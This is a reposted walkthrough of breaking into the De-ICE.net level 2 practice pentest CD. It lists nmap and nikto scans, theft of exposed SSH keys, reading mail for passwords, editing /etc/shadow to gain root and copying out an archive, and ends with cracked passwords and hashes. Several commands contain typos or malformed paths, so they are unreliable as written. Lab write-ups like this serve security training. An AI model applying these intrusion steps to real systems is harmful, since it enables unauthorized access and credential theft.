*** Do NOT attack any computer or network without authorization or you may put into jail. ***Credit to : g0tmi1k
This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.
The original post at here
Links
Watch video on-line
Download video
What is this?
This is my walk though of how I broke into the De-ICE.net network, level 2, disk 1.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.
What do I need?
BackTrack 4 (Final)
de-ice.net-2.100-1.1.iso (MD5: 09798f85bf54a666fbab947300f38163)
Dictionary(s)
Software
Name: De-ICE.net
Version: 2.0 (Level 1 - Disk 2 - IP Address: 1.100)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/
Download Link:
http://heorot.net/instruction/tutorials/iso/de-ice.net-2.100-1.1.iso
http://www.mediafire.com/file/uyecnhvkeije0br/de-ice.net-2.100-1.0.part1.rar
http://www.mediafire.com/file/l2ezefrg05mmtrr/de-ice.net-2.100-1.0.part2.rar
Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=18&t=16
WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks
Commands
nmap -n 192.168.2.1-255
nmap -n -sV -sS -O 192.168.2.100
nmap -n -sV -sS -O 192.168.2.101
firefox 192.168.2.100
[+]kate -> list of possible usernames. Save. Filename: usernames.txt
firefox 192.168.2.101
[+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin) with '~' infront. -> http://192.168.2.101 -> 80
firefox http://192.168.2.101/~pirrip
[+]kate -> Update usernames with the ones which we got a respond from. Save.
[+]BackTrck -> Web Application Analysis -> Web (frontend) -> nikto2
./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124
firefox http://192.168.2.101/~pirrip/.ssh
// Save both files
mv /root/id_rsa /http://root/.ssh/id_rsa
mv /root/id_rsa.pub /http://root/.ssh/id_rsa.pub
chmod 000 /http://root/.ssh/id_rsa
chmod 000 /http://root/.ssh/id_rsa.pub
ssh pirrip@192.168.2.100
// Yes
mailx
// 3 - we see that havisham passowrd is 'changeme'. 7 - we seen pirrip password is '0l1v3rTw1st'
cd /etc/
vi passwd
// kate -> Update usernames with only valid ones.
vi group
sudo vi shadow
// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st
su
// Password: 0l1v3rTw1st
cd /root/
ls -a
cd .save/
ls -a
chmod -R 777 /root/
//In BackTrack//
scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/
unzip great_expectations.zip
tar xf great_expectations.tar
strings Jan08
//In SSH//
sudo iv /var/mail/havisham
modprobe capability
//In BackTrack//
ftp 192.168.2.100
// Usrename: pirri. Password: 0l1v3rTw1st //
ls -a
//In SSH//
exit
//In BackTrack//
[+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:P1ckw1ckP@p3rs root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
havisham:changeme havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:0l1v3rTw1st pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes
Dictionaries : http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html
That's all! See you.